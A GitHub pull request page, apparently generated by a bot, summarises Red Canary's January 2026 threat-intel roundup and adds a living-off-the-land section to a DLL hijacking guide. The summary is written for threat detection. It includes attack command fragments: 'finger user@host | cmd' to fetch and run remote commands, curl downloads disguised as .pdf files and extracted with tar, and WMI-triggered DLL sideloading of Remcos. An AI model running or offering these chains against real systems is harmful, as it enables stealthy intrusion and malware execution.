Intelligence Insights January 2026 #1798
Open
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
🤖 Automated Content Update
This PR was automatically generated by the HackTricks News Bot based on a technical blog post.
📝 Source Information
🎯 Content Summary
Title/Scope
Red Canary’s “Intelligence Insights: January 2026” is a threat-intel roundup based on detections across unique customer environments (counts represent the number of unique environments where Red Canary observed the activity). The post is not a CVE write-up, but it documents concrete, operator-style execution chains (copy/paste command lines) and highlights detection opportunities around LOLBAS abuse and DLL sideloading.
Threat landscape context (observed largel...
🔧 Technical Details
LOLBAS remote command execution via
fingerpiped intocmd: If an attacker can convince a user to run a one-liner (“paste-and-run”), they can use the Windowsfingerclient to fetch attacker-controlled plaintext over TCP/79 and pipe it tocmd(e.g.,finger user@host | cmd). Becausecmdinterprets stdin as commands, the remote server response becomes a dynamic second-stage script, enabling fileless/low-artifact execution and easy server-side payload rotation.Disguised archive staging with built-ins (
curl+tar): Attackers can download a payload container usingcurl -s -Lbut save it with a misleading extension (e.g.,.pdf), then extract it usingtar -xfinto a randomized staging directory (commonly under%LocalAppData%). This reduces obvious indicators (like.zip/.7znames) while relyin...🤖 Agent Actions
Updated DLL hijacking guide with a new section describing a living-off-the-land chain: Finger-based remote command staging piped into cmd, stealthy curl/tar extraction of disguised payloads, WMI/CIM process creation to trigger DLL sideloads (e.g., Remcos under trusted binaries), plus forfiles hunting tips; added Red Canary Intelligence Insights reference. Tests were not run (documentation change).
This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.